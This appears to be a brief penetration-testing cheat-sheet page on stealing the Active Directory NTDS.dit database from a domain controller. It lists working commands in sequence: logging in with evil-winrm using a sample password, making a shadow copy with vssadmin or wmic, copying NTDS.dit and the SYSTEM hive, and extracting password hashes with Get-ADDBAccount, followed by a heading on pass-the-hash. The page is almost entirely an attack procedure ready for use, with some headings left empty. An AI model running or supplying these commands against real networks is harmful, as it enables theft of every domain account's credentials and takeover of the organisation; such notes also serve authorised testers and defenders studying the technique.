githubEdit

copy-ntds.dit

Capturing NTDS.dit

%systemroot%/ntds

Connect to a DC with evil-winRM

evil-winrm -i 10.10.10.1 -u bwilliamson -p 'p@aw@123'

Copying NTDS.dit file

Create shadow copy of c:

vssadmin CREATE SHADOW /For=C:
wmic shadowcopy call create Volume='C:\'

Copy NTDS.dit from VSS

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\ntds.dit 

Copy SYSTEM file (to decrypt NTDS.dit)

reg SAVE hklm\system c:\system.save

Extract password from NTDS.dit

Get-ADDBAccount -All -DBPath 'c:\ntds.dit' -Bootkey $key
					OR

Copy NTDS.dit file (fast method)

Pass-the-hash attack (if we are unsuccessful to crack hash, use hash to login)

Last updated